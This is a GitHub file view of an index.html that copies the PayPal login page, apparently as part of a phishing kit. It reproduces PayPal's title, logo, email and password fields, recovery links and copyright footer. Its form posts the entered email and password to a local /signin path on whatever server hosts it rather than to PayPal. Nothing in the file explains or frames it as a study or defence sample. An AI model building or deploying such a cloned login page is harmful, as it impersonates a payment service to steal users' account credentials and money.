-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathindex.html
14 lines (12 loc) · 5 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Log in to your PayPal account</title>
<link rel="stylesheet" href="assets/main.css">
</head>
<body>
<div class="corral"><div class="contentContainer activeContent"><header><p class="paypal-logo paypal-logo-long"></p></header><h1 class="headerText accessAid">Log in to your PayPal account</h1><div class="notifications"></div><!-- temporary addition of notification which will just be displayed after clicking next in the phone page. This is for mobile ID login initial ramp and should be removed when we do public credential check --><form action="/signin?country.x=MA&locale.x=en_MA" method="post" class="proceed maskable" autocomplete="off" name="login" novalidate=""><input type="hidden" id="token" name="_csrf" value="g3qozkCAUzuqJ6pF1NOJSaui1/1RSKhsQzIuw="><input type="hidden" name="locale.x" value="en_US"><input type="hidden" name="processSignin" value="main"><input type="hidden" name="fn_sync_data" value="fn_sync_data"><input type="hidden" name="intent" value="signin"><input type="hidden" name="ads-client-context" value="signin"><input type="hidden" name="requestUrl" value="/signin?country.x=MA&locale.x=en_MA"><div id="passwordSection" class="clearfix"><div id="emailSection" class="clearfix"><div class="textInput" id="login_emaildiv" style="z-index: 1;"><div class="fieldWrapper"><label for="email" class="fieldLabel">Email address</label><input id="email" name="login_email" type="email" class="hasHelp validateEmpty " required="required" aria-required="true" value="[email protected]" autocomplete="off" placeholder="Email address"></div><div class="errorMessage" id="emailErrorMessage"><p class="emptyError hide">Enter your email address.</p><p class="invalidError hide">That email address format isn’t right</p></div></div></div><div id="passwordSection" class="clearfix"><div class="textInput" id="login_passworddiv" style="z-index: 1;"><div class="fieldWrapper"><label for="password" class="fieldLabel">Enter your password</label><input id="password" name="login_password" type="password" class="hasHelp validateEmpty pin-password" required="required" aria-required="true" value="" placeholder="Enter your password"><button type="button" class="showPassword show-hide-password scTrack:unifiedlogin-show-password" aria-label="Show password">Show</button><button type="button" class="hidePassword hide show-hide-password scTrack:unifiedlogin-hide-password" aria-label="Hide">Hide</button></div><div class="errorMessage" id="passwordErrorMessage"><p class="emptyError hide">Enter your password.</p></div></div></div></div><div class="actions actionsSpacedShort"><button class="button actionContinue scTrack:unifiedlogin-login-submit" type="submit" id="btnLogin" name="btnLogin" value="Login">Log In</button></div><input type="hidden" name="splitLoginContext" value="inputPassword"><input type="hidden" name="splitLoginCookiedFallback" value="true"></form><div class="moreOptionsDiv hide" id="moreOptionsContainer"><a href="#" id="moreOptions" class="moreOptionsInfo">More options</a><div class="bubble-tooltip hide" id="moreOptions-recovery-modal"><ul class="moreoptionsGroup"><li><a href="#" id="moreOptionsMobile" class="scTrack:unifiedlogin-click-more-options-mobile">Approve login using mobile device</a></li><li><a href="/authflow/password-recovery/?country.x=MA&locale.x=en_US" class="scTrack:unifiedlogin-click-forgot-password pwrLink startPwrFlowBtn">Having trouble logging in?</a></li></ul></div></div><div class="forgotLink"><a href="/authflow/password-recovery/?country.x=MA&locale.x=en_US" class="scTrack:unifiedlogin-click-forgot-password pwrLink startPwrFlowBtn">Having trouble logging in?</a></div><div class="pwr-modal forgotPasswordModal" id="password-recovery-modal" aria-label="Password Recovery"><iframe id="pwdIframe" data-src="/authflow/password-recovery/?country.x=MA&locale.x=en_US" scrolling="no" data-auto-reload="true"></iframe><div class="monogram-small"></div><button class="ui-dialog-titlebar-close" type="button"></button></div><div id="signupContainer" class="signupContainer" data-hide-on-email="" data-hide-on-pass=""><div class="loginSignUpSeparator"><span class="textInSeparator" aria-label="or">or</span></div><a href="/ma/webapps/mpp/account-selection" class="button secondary scTrack:unifiedlogin-click-signup-button" id="createAccount">Sign Up</a></div></div></div>
<footer class="footer" role="contentinfo"><div class="legalFooter"><div class="extendedContent"><ul class="footerGroup footerGroupWithSiblings"><li><a href="/ma/webapps/mpp/ua/privacy-full">Privacy</a></li><li><a href="/ma/webapps/mpp/ua/legalhub-full">Legal</a></li></ul><p class="footerCopyright">Copyright © 1999-2018 PayPal. All rights reserved.</p><p class="footerDisclaimer">Consumer advisory - PayPal Pte. Ltd., the holder of PayPal's stored value facility, does not require the approval of the Monetary Authority of Singapore. Users are advised to read the <a href="/ma/webapps/mpp/ua/legalhub-full">terms and conditions</a> carefully.</p></div></div></footer>
</body>
</html>